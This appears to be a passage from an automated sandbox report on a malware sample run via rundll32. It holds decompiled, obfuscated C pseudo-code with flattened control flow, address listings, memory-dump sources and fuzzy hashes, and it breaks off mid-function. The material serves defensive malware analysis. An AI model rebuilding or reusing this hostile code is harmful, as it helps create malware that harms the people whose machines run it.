                                                                                                                      				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
                                                                                                                      				 *(_t321 + 0x4c) = 0xbf15d9;
                                                                                                                      				_t313 = 0x6c;
                                                                                                                      				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
                                                                                                                      				_t314 = 0x6b;
                                                                                                                      				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
                                                                                                                      				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
                                                                                                                      				 *(_t321 + 0x30) = 0x4468c3;
                                                                                                                      				_t315 = 0x7e;
                                                                                                                      				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
                                                                                                                      				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
                                                                                                                      				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
                                                                                                                      				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t292 =  *0x6a3e08; // 0x0
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t237 =  *(_t321 + 0x60);
                                                                                                                      						L3:
                                                                                                                      						while(_t262 != 0x160fcc4) {
                                                                                                                      							if(_t262 == 0x26954f0) {
                                                                                                                      								 *_t237 = _t319;
                                                                                                                      								_t262 = 0xfeff895;
                                                                                                                      								 *_t292 =  *_t292 + 1;
                                                                                                                      								_t237 = _t319;
                                                                                                                      								 *(_t321 + 0x60) = _t237;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t262 == 0x40ff1a8) {
                                                                                                                      									_t179 = _t292 + 0x20; // 0x20
                                                                                                                      									_t237 = _t179;
                                                                                                                      									_t262 = 0x5ead19b;
                                                                                                                      									 *(_t321 + 0x60) = _t237;
                                                                                                                      									continue;
                                                                                                                      								} else {
                                                                                                                      									if(_t262 == 0x58e8483) {
                                                                                                                      										_push(_t262);
                                                                                                                      										_push(_t262);
                                                                                                                      										_t302 = 0x40;
                                                                                                                      										_t319 = E00687FF2(_t302);
                                                                                                                      										__eflags = _t319;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											goto L20;
                                                                                                                      										} else {
                                                                                                                      											_t262 = 0x160fcc4;
                                                                                                                      											goto L1;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t262 == 0x5ead19b) {
                                                                                                                      											_t255 = E00697BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x6a3000);
                                                                                                                      											 *(_t321 + 0x70) = _t255;
                                                                                                                      											_t306 = _t255;
                                                                                                                      											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
                                                                                                                      											_t262 = 0x58e8483;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t292 =  *0x6a3e08; // 0x0
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t262 == 0xd41016e) {
                                                                                                                      												E00698519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                      												L20:
                                                                                                                      												_t292 =  *0x6a3e08; // 0x0
                                                                                                                      											} else {
                                                                                                                      												if(_t262 != 0xfeff895) {
                                                                                                                      													L17:
                                                                                                                      													__eflags = _t262 - 0x20f61b3;
                                                                                                                      													if(__eflags != 0) {
                                                                                                                      														L2:
                                                                                                                      														_t237 =  *(_t321 + 0x60);
                                                                                                                      														continue;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													asm("sbb ecx, ecx");
                                                                                                                      													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                      							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                      							__eflags = 1;
                                                                                                                      							return 1;
                                                                                                                      						}
                                                                                                                      						_push( *(_t321 + 0x1c));
                                                                                                                      						_push( *(_t321 + 0x38));
                                                                                                                      						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                      						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                      						E00691652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E0069DCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x681590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                      						E0068A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                      						_t321 = _t321 + 0x3c;
                                                                                                                      						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                      						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                      						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                      						_t306 = _t306 + 8;
                                                                                                                      						_t262 = 0x26954f0;
                                                                                                                      						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                      						__eflags = _t301;
                                                                                                                      						 *(_t319 + 0x18) = _t301;
                                                                                                                      						_t292 =  *0x6a3e08; // 0x0
                                                                                                                      						goto L17;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}





















                                                                                                                      0x006a10aa
                                                                                                                      0x006a10b2
                                                                                                                      0x006a10bc
                                                                                                                      0x006a10c0
                                                                                                                      0x006a10c8
                                                                                                                      0x006a10d0
                                                                                                                      0x006a10d8
                                                                                                                      0x006a10e0
                                                                                                                      0x006a10e8
                                                                                                                      0x006a10f0
                                                                                                                      0x006a10f8
                                                                                                                      0x006a10fd
                                                                                                                      0x006a1107
                                                                                                                      0x006a1116
                                                                                                                      0x006a1119
                                                                                                                      0x006a111d
                                                                                                                      0x006a1129
                                                                                                                      0x006a112d
                                                                                                                      0x006a1131
                                                                                                                      0x006a1139
                                                                                                                      0x006a1141
                                                                                                                      0x006a1149
                                                                                                                      0x006a114e
                                                                                                                      0x006a1156
                                                                                                                      0x006a115e
                                                                                                                      0x006a1166
                                                                                                                      0x006a116e
                                                                                                                      0x006a1176
                                                                                                                      0x006a1182
                                                                                                                      0x006a1187
                                                                                                                      0x006a1191
                                                                                                                      0x006a1196
                                                                                                                      0x006a119c
                                                                                                                      0x006a11a4
                                                                                                                      0x006a11b1
                                                                                                                      0x006a11b2
                                                                                                                      0x006a11bc
                                                                                                                      0x006a11c5
                                                                                                                      0x006a11c9
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x00000000
                                                                                                                      0x006a11db
                                                                                                                      0x006a11ed
                                                                                                                      0x006a12a8
                                                                                                                      0x006a12aa
                                                                                                                      0x006a12af
                                                                                                                      0x006a12b1
                                                                                                                      0x006a12b3
                                                                                                                      0x00000000
                                                                                                                      0x006a11f3
                                                                                                                      0x006a11f9
                                                                                                                      0x006a1297
                                                                                                                      0x006a1297
                                                                                                                      0x006a129a
                                                                                                                      0x006a129f
                                                                                                                      0x00000000
                                                                                                                      0x006a11ff
                                                                                                                      0x006a1205
                                                                                                                      0x006a1277
                                                                                                                      0x006a1278
                                                                                                                      0x006a127b
                                                                                                                      0x006a1281
                                                                                                                      0x006a1285
                                                                                                                      0x006a1287
                                                                                                                      0x00000000
                                                                                                                      0x006a128d
                                                                                                                      0x006a128d
                                                                                                                      0x00000000
                                                                                                                      0x006a128d
                                                                                                                      0x006a1207
                                                                                                                      0x006a120d
                                                                                                                      0x006a124c
                                                                                                                      0x006a1252
                                                                                                                      0x006a1256
                                                                                                                      0x006a125d
                                                                                                                      0x006a1261
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x006a11d1
                                                                                                                      0x00000000
                                                                                                                      0x006a11d1
                                                                                                                      0x006a120f
                                                                                                                      0x006a1215
                                                                                                                      0x006a138c
                                                                                                                      0x006a1392
                                                                                                                      0x006a1392
                                                                                                                      0x006a121b
                                                                                                                      0x006a1221
                                                                                                                      0x006a1373
                                                                                                                      0x006a1373
                                                                                                                      0x006a1379
                                                                                                                      0x006a11d7
                                                                                                                      0x006a11d7
                                                                                                                      0x00000000
                                                                                                                      0x006a11d7
                                                                                                                      0x006a1227
                                                                                                                      0x006a122b
                                                                                                                      0x006a1233
                                                                                                                      0x00000000
                                                                                                                      0x006a1233
                                                                                                                      0x006a1221
                                                                                                                      0x006a1215
                                                                                                                      0x006a120d
                                                                                                                      0x006a1205
                                                                                                                      0x006a11f9
                                                                                                                      0x006a139b
                                                                                                                      0x006a13a1
                                                                                                                      0x006a13a7
                                                                                                                      0x006a13ac
                                                                                                                      0x006a13ac
                                                                                                                      0x006a12c4
                                                                                                                      0x006a12ca
                                                                                                                      0x006a12d5
                                                                                                                      0x006a12dc
                                                                                                                      0x006a131e
                                                                                                                      0x006a1333
                                                                                                                      0x006a133c
                                                                                                                      0x006a134a
                                                                                                                      0x006a134e
                                                                                                                      0x006a1351
                                                                                                                      0x006a1354
                                                                                                                      0x006a1361
                                                                                                                      0x006a1366
                                                                                                                      0x006a1366
                                                                                                                      0x006a1369
                                                                                                                      0x006a136d
                                                                                                                      0x00000000
                                                                                                                      0x006a136d
                                                                                                                      0x006a11d7

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 4t$=r;$_O\$mWv$N
                                                                                                                      • API String ID: 0-1837770866
                                                                                                                      • Opcode ID: 2983c8908845732896e6f8202ea59ee781727e808d6ce3ea21b53b470e671463
                                                                                                                      • Instruction ID: 6c62011ae882e5b3c87a0cc6d2480bccdeaea9949a55ac4f3776fb098db395a6
                                                                                                                      • Opcode Fuzzy Hash: 2983c8908845732896e6f8202ea59ee781727e808d6ce3ea21b53b470e671463
                                                                                                                      • Instruction Fuzzy Hash: 7EC142715083819FC358DF25C48945BBFE2FBCA358F108A0EF5969A260D3B4D949CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E006966CA() {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				signed int _v1044;
                                                                                                                      				intOrPtr _v1048;
                                                                                                                      				intOrPtr _v1052;
                                                                                                                      				intOrPtr _v1056;
                                                                                                                      				unsigned int _v1060;
                                                                                                                      				signed int _v1064;
                                                                                                                      				signed int _v1068;
                                                                                                                      				signed int _v1072;
                                                                                                                      				signed int _v1076;
                                                                                                                      				signed int _v1080;
                                                                                                                      				signed int _v1084;
                                                                                                                      				signed int _v1088;
                                                                                                                      				signed int _v1092;
                                                                                                                      				signed int _v1096;
                                                                                                                      				signed int _v1100;
                                                                                                                      				signed int _v1104;
                                                                                                                      				signed int _v1108;
                                                                                                                      				signed int _v1112;
                                                                                                                      				signed int _v1116;
                                                                                                                      				signed int _v1120;
                                                                                                                      				signed int _v1124;
                                                                                                                      				signed int _v1128;
                                                                                                                      				signed int _v1132;
                                                                                                                      				signed int _v1136;
                                                                                                                      				signed int _v1140;
                                                                                                                      				signed int _v1144;
                                                                                                                      				signed int _v1148;
                                                                                                                      				signed int _v1152;
                                                                                                                      				signed int _v1156;
                                                                                                                      				signed int _v1160;
                                                                                                                      				signed int _v1164;
                                                                                                                      				void* _t263;
                                                                                                                      				void* _t264;
                                                                                                                      				intOrPtr _t265;
                                                                                                                      				void* _t268;
                                                                                                                      				void* _t269;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				intOrPtr _t282;
                                                                                                                      				intOrPtr _t289;
                                                                                                                      				intOrPtr _t306;
                                                                                                                      				void* _t310;
                                                                                                                      				signed int* _t314;
                                                                                                                      
                                                                                                                      				_t314 =  &_v1164;
                                                                                                                      				_v1044 = _v1044 & 0x00000000;
                                                                                                                      				_v1056 = 0xc409ba;
                                                                                                                      				_v1052 = 0xa85c92;
                                                                                                                      				_v1048 = 0x441ffc;
                                                                                                                      				_v1160 = 0xafc02f;
                                                                                                                      				_v1160 = _v1160 + 0xffff4fb0;
                                                                                                                      				_v1160 = _v1160 + 0x85f3;
                                                                                                                      				_t272 = 0x2a;
                                                                                                                      				_v1160 = _v1160 / _t272;
                                                                                                                      				_v1160 = _v1160 ^ 0x000b1184;
                                                                                                                      				_t310 = 0xb516bbb;
                                                                                                                      				_v1060 = 0xeb49a4;
                                                                                                                      				_v1060 = _v1060 >> 5;
                                                                                                                      				_v1060 = _v1060 ^ 0x00095d90;
                                                                                                                      				_v1136 = 0x74fb0a;
                                                                                                                      				_t273 = 0x7f;
                                                                                                                      				_v1136 = _v1136 * 0x1e;
                                                                                                                      				_v1136 = _v1136 ^ 0x978de9ec;
                                                                                                                      				_v1136 = _v1136 ^ 0xad10b4f2;
                                                                                                                      				_v1136 = _v1136 ^ 0x372b3a8e;
                                                                                                                      				_v1152 = 0xb92c6e;
                                                                                                                      				_v1152 = _v1152 ^ 0x0e0e3092;
                                                                                                                      				_v1152 = _v1152 | 0x72fa6aba;
                                                                                                                      				_v1152 = _v1152 + 0xffff103c;
                                                                                                                      				_v1152 = _v1152 ^ 0x7efa5fdf;
                                                                                                                      				_v1128 = 0x794cf8;
                                                                                                                      				_v1128 = _v1128 ^ 0x9a366bfc;
                                                                                                                      				_v1128 = _v1128 + 0xde36;
                                                                                                                      				_v1128 = _v1128 ^ 0x5c71c30d;
                                                                                                                      				_v1128 = _v1128 ^ 0xc6263e62;
                                                                                                                      				_v1156 = 0x79c02;
                                                                                                                      				_v1156 = _v1156 + 0xfffffb46;
                                                                                                                      				_v1156 = _v1156 | 0x060cf66c;
                                                                                                                      				_v1156 = _v1156 ^ 0x799dfdb7;
                                                                                                                      				_v1156 = _v1156 ^ 0x7f9bfbef;
                                                                                                                      				_v1164 = 0xbfcf15;
                                                                                                                      				_v1164 = _v1164 >> 3;
                                                                                                                      				_v1164 = _v1164 << 0xc;
                                                                                                                      				_v1164 = _v1164 << 3;
                                                                                                                      				_v1164 = _v1164 ^ 0xfcf89fe4;
                                                                                                                      				_v1112 = 0xe0c8d1;
                                                                                                                      				_v1112 = _v1112 ^ 0xbad245c5;
                                                                                                                      				_v1112 = _v1112 << 5;
                                                                                                                      				_v1112 = _v1112 ^ 0x4653cc84;
                                                                                                                      				_v1116 = 0x38a8e4;
                                                                                                                      				_v1116 = _v1116 + 0xffff2cc2;
                                                                                                                      				_v1116 = _v1116 + 0x453c;
                                                                                                                      				_v1116 = _v1116 ^ 0x0030e111;
                                                                                                                      				_v1144 = 0x8706d;
                                                                                                                      				_v1144 = _v1144 | 0x44a168a8;
                                                                                                                      				_v1144 = _v1144 * 0x4d;
                                                                                                                      				_v1144 = _v1144 >> 0x10;
                                                                                                                      				_v1144 = _v1144 ^ 0x0002b082;
                                                                                                                      				_v1068 = 0x3ad283;
                                                                                                                      				_v1068 = _v1068 + 0xc4d8;
                                                                                                                      				_v1068 = _v1068 ^ 0x003ad5e6;
                                                                                                                      				_v1148 = 0xbbdd96;
                                                                                                                      				_v1148 = _v1148 / _t273;
                                                                                                                      				_v1148 = _v1148 + 0xffff10a8;
                                                                                                                      				_v1148 = _v1148 + 0xdbb9;
                                                                                                                      				_v1148 = _v1148 ^ 0x00089235;
                                                                                                                      				_v1084 = 0xf8cace;
                                                                                                                      				_v1084 = _v1084 ^ 0x230d76f6;
                                                                                                                      				_v1084 = _v1084 ^ 0x23f29212;
                                                                                                                      				_v1140 = 0x18cea;
                                                                                                                      				_v1140 = _v1140 << 3;
                                                                                                                      				_v1140 = _v1140 << 0xa;
                                                                                                                      				_v1140 = _v1140 + 0xffff66c6;
                                                                                                                      				_v1140 = _v1140 ^ 0x3196ba0a;
                                                                                                                      				_v1104 = 0x64ea4d;
                                                                                                                      				_v1104 = _v1104 >> 0xe;
                                                                                                                      				_v1104 = _v1104 << 0x10;
                                                                                                                      				_v1104 = _v1104 ^ 0x01951052;
                                                                                                                      				_v1120 = 0x40e961;
                                                                                                                      				_v1120 = _v1120 ^ 0xb7fb83c2;
                                                                                                                      				_v1120 = _v1120 + 0xb75e;
                                                                                                                      				_v1120 = _v1120 ^ 0xb7bbc099;
                                                                                                                      				_v1096 = 0x7779e0;
                                                                                                                      				_v1096 = _v1096 | 0x86983bb4;
                                                                                                                      				_v1096 = _v1096 ^ 0x86f0c1f2;
                                                                                                                      				_v1100 = 0xda5543;
                                                                                                                      				_v1100 = _v1100 + 0xffff2368;
                                                                                                                      				_v1100 = _v1100 + 0xffff6302;
                                                                                                                      				_v1100 = _v1100 ^ 0x00d61d50;
                                                                                                                      				_v1132 = 0x843ae5;
                                                                                                                      				_v1132 = _v1132 + 0xae05;
                                                                                                                      				_v1132 = _v1132 >> 9;
                                                                                                                      				_v1132 = _v1132 | 0xb52a1de5;
                                                                                                                      				_v1132 = _v1132 ^ 0xb5269cc0;
                                                                                                                      				_v1064 = 0x4bdca1;
                                                                                                                      				_t274 = 0x36;
                                                                                                                      				_v1064 = _v1064 * 0x2d;
                                                                                                                      				_v1064 = _v1064 ^ 0x0d50802d;
                                                                                                                      				_v1076 = 0xc70263;
                                                                                                                      				_v1076 = _v1076 ^ 0xed1c16c4;
                                                                                                                      				_v1076 = _v1076 ^ 0xeddf4f32;
                                                                                                                      				_v1108 = 0x3676a5;
                                                                                                                      				_v1108 = _v1108 << 0x10;
                                                                                                                      				_v1108 = _v1108 << 8;
                                                                                                                      				_v1108 = _v1108 ^ 0xa501f64e;
                                                                                                                      				_v1088 = 0x1a5bc1;
                                                                                                                      				_v1088 = _v1088 / _t274;
                                                                                                                      				_v1088 = _v1088 ^ 0x00023ab9;
                                                                                                                      				_v1092 = 0xcce8ca;
                                                                                                                      				_v1092 = _v1092 + 0xffff41cd;
                                                                                                                      				_v1092 = _v1092 ^ 0x00c96fdb;
                                                                                                                      				_v1072 = 0x26dee9;
                                                                                                                      				_t275 = 0x31;
                                                                                                                      				_v1072 = _v1072 * 0x7c;
                                                                                                                      				_v1072 = _v1072 ^ 0x12da7d33;
                                                                                                                      				_v1124 = 0xc51f8;
                                                                                                                      				_v1124 = _v1124 * 0x7c;
                                                                                                                      				_v1124 = _v1124 | 0x22e20644;
                                                                                                                      				_v1124 = _v1124 + 0xffff053d;
                                                                                                                      				_v1124 = _v1124 ^ 0x27f3e63a;
                                                                                                                      				_v1080 = 0x33633f;
                                                                                                                      				_v1080 = _v1080 / _t275;
                                                                                                                      				_v1080 = _v1080 ^ 0x000716b7;
                                                                                                                      				E00695C73(_t275);
                                                                                                                      				do {
                                                                                                                      					while(_t310 != 0xc63ed) {
                                                                                                                      						if(_t310 == 0x5b9c87d) {
                                                                                                                      							_push(_v1104);
                                                                                                                      							_push(_v1140);
                                                                                                                      							_t263 = E0069DCF7(_v1084, 0x681060, __eflags);
                                                                                                                      							_t264 = E0069D25E(_v1120);
                                                                                                                      							_t282 =  *0x6a3e10; // 0x0
                                                                                                                      							_t265 =  *0x6a3e10; // 0x0
                                                                                                                      							E0069453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
                                                                                                                      							_t268 = E0068A8B0(_v1088, _t263, _v1092);
                                                                                                                      							_t314 =  &(_t314[0xa]);
                                                                                                                      							_t310 = 0xc63ed;
                                                                                                                      							continue;
                                                                                                                      						} else {
                                                                                                                      							if(_t310 == 0xb516bbb) {
                                                                                                                      								_t310 = 0xc84e726;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								_t319 = _t310 - 0xc84e726;
                                                                                                                      								if(_t310 == 0xc84e726) {
                                                                                                                      									_push(_v1128);
                                                                                                                      									_push(_v1152);
                                                                                                                      									_t269 = E0069DCF7(_v1136, 0x681000, _t319);
                                                                                                                      									_t289 =  *0x6a3e10; // 0x0
                                                                                                                      									_t306 =  *0x6a3e10; // 0x0
                                                                                                                      									E006847CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                      									_t268 = E0068A8B0(_v1068, _t269, _v1148);
                                                                                                                      									_t314 =  &(_t314[9]);
                                                                                                                      									_t310 = 0x5b9c87d;
                                                                                                                      									continue;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L9;
                                                                                                                      					}
                                                                                                                      					_push(_v1080);
                                                                                                                      					_push( &_v1040);
                                                                                                                      					_push(_v1124);
                                                                                                                      					E006A13AD(_v1072,  &_v520, __eflags);
                                                                                                                      					_t314 =  &(_t314[3]);
                                                                                                                      					_t310 = 0xafb2886;
                                                                                                                      					L9:
                                                                                                                      					__eflags = _t310 - 0xafb2886;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t268;
                                                                                                                      			}

                                                                                                                      0x0069699d
                                                                                                                      0x006969a5
                                                                                                                      0x006969ad
                                                                                                                      0x006969b5
                                                                                                                      0x006969ba
                                                                                                                      0x006969bf
                                                                                                                      0x006969c7
                                                                                                                      0x006969d7
                                                                                                                      0x006969db
                                                                                                                      0x006969e3
                                                                                                                      0x006969eb
                                                                                                                      0x006969f3
                                                                                                                      0x006969fb
                                                                                                                      0x00696a08
                                                                                                                      0x00696a09
                                                                                                                      0x00696a0d
                                                                                                                      0x00696a15
                                                                                                                      0x00696a22
                                                                                                                      0x00696a26
                                                                                                                      0x00696a2e
                                                                                                                      0x00696a36
                                                                                                                      0x00696a3e
                                                                                                                      0x00696a4c
                                                                                                                      0x00696a50
                                                                                                                      0x00696a60
                                                                                                                      0x00696a74
                                                                                                                      0x00696a74
                                                                                                                      0x00696a82
                                                                                                                      0x00696b0d
                                                                                                                      0x00696b16
                                                                                                                      0x00696b1e
                                                                                                                      0x00696b2f
                                                                                                                      0x00696b34
                                                                                                                      0x00696b47
                                                                                                                      0x00696b6a
                                                                                                                      0x00696b7c
                                                                                                                      0x00696b81
                                                                                                                      0x00696b84
                                                                                                                      0x00000000
                                                                                                                      0x00696a88
                                                                                                                      0x00696a8e
                                                                                                                      0x00696b06
                                                                                                                      0x00000000
                                                                                                                      0x00696a90
                                                                                                                      0x00696a90
                                                                                                                      0x00696a92
                                                                                                                      0x00696a98
                                                                                                                      0x00696aa1
                                                                                                                      0x00696aa9
                                                                                                                      0x00696aba
                                                                                                                      0x00696ad2
                                                                                                                      0x00696ae5
                                                                                                                      0x00696af7
                                                                                                                      0x00696afc
                                                                                                                      0x00696aff
                                                                                                                      0x00000000
                                                                                                                      0x00696aff
                                                                                                                      0x00696a92
                                                                                                                      0x00696a8e
                                                                                                                      0x00000000
                                                                                                                      0x00696a82
                                                                                                                      0x00696b8e
                                                                                                                      0x00696b99
                                                                                                                      0x00696b9a
                                                                                                                      0x00696ba9
                                                                                                                      0x00696bae
                                                                                                                      0x00696bb1
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bb3
                                                                                                                      0x00696bc5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <E$?c3$Md$a@$yw
                                                                                                                      • API String ID: 0-2084988834
                                                                                                                      • Opcode ID: cd731207f48e59872e4e3bf1d1c9981d8be4f2931cf5f5d6bfc18411d4346a9e
                                                                                                                      • Instruction ID: 755dc892a99b41bb1529c73ec859c4ecc60e569683546be63e848551b58ceccd
                                                                                                                      • Opcode Fuzzy Hash: cd731207f48e59872e4e3bf1d1c9981d8be4f2931cf5f5d6bfc18411d4346a9e
                                                                                                                      • Instruction Fuzzy Hash: 26C130724083809FD768DF25C58A81BBBF2FB94758F108A1DF5A696260D3B58A09CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00690001(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				intOrPtr _v136;
                                                                                                                      				intOrPtr _v140;
                                                                                                                      				char _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				void* _t154;
                                                                                                                      				void* _t174;
                                                                                                                      				char _t178;
                                                                                                                      				void* _t183;
                                                                                                                      				char* _t189;
                                                                                                                      				void* _t209;
                                                                                                                      				signed int _t210;
                                                                                                                      				signed int _t211;
                                                                                                                      				signed int _t212;
                                                                                                                      				signed int _t213;
                                                                                                                      				signed int _t214;
                                                                                                                      				signed int _t215;
                                                                                                                      				signed int _t216;
                                                                                                                      				signed int* _t220;
                                                                                                                      
                                                                                                                      				_push(_a4);
                                                                                                                      				_t209 = __edx;
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t154);
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_t220 =  &(( &_v204)[3]);
                                                                                                                      				_v140 = 0x6f537b;
                                                                                                                      				_v136 = 0x2895cf;
                                                                                                                      				_t183 = 0xf669bfa;
                                                                                                                      				_v164 = 0xc3509d;
                                                                                                                      				_v164 = _v164 >> 0xf;
                                                                                                                      				_v164 = _v164 ^ 0x0007728b;
                                                                                                                      				_v188 = 0x58efa0;
                                                                                                                      				_v188 = _v188 + 0xffff9444;
                                                                                                                      				_t210 = 0x2f;
                                                                                                                      				_v188 = _v188 / _t210;
                                                                                                                      				_v188 = _v188 ^ 0x000ac4b2;
                                                                                                                      				_v176 = 0xa783cc;
                                                                                                                      				_v176 = _v176 << 0xa;
                                                                                                                      				_v176 = _v176 ^ 0x73295065;
                                                                                                                      				_v176 = _v176 ^ 0xed239367;
                                                                                                                      				_v148 = 0x42262a;
                                                                                                                      				_v148 = _v148 | 0x228e56d6;
                                                                                                                      				_v148 = _v148 ^ 0x22cd87d0;
                                                                                                                      				_v204 = 0xc47428;
                                                                                                                      				_v204 = _v204 + 0xffff2e33;
                                                                                                                      				_v204 = _v204 + 0xffff2fa2;
                                                                                                                      				_v204 = _v204 + 0xffff28a7;
                                                                                                                      				_v204 = _v204 ^ 0x00c63754;
                                                                                                                      				_v156 = 0x11bd56;
                                                                                                                      				_t211 = 0x5c;
                                                                                                                      				_v156 = _v156 * 0x6a;
                                                                                                                      				_v156 = _v156 ^ 0x0752342f;
                                                                                                                      				_v172 = 0x489beb;
                                                                                                                      				_v172 = _v172 + 0xfe21;
                                                                                                                      				_v172 = _v172 / _t211;
                                                                                                                      				_v172 = _v172 ^ 0x0000a4d4;
                                                                                                                      				_v192 = 0x2e5859;
                                                                                                                      				_v192 = _v192 ^ 0x83ba67d9;
                                                                                                                      				_t212 = 0x44;
                                                                                                                      				_v192 = _v192 / _t212;
                                                                                                                      				_v192 = _v192 ^ 0x01e00d99;
                                                                                                                      				_v180 = 0x89bc6d;
                                                                                                                      				_v180 = _v180 | 0xb1d25d45;
                                                                                                                      				_v180 = _v180 << 0xe;
                                                                                                                      				_v180 = _v180 ^ 0xff5cc309;
                                                                                                                      				_v168 = 0x19805c;
                                                                                                                      				_t213 = 0x18;
                                                                                                                      				_v168 = _v168 * 0x16;
                                                                                                                      				_v168 = _v168 ^ 0x4d2845a5;
                                                                                                                      				_v168 = _v168 ^ 0x4f1adce1;
                                                                                                                      				_v196 = 0x9cfdcd;
                                                                                                                      				_v196 = _v196 / _t213;
                                                                                                                      				_v196 = _v196 + 0xd8a6;
                                                                                                                      				_v196 = _v196 ^ 0x0005e56c;
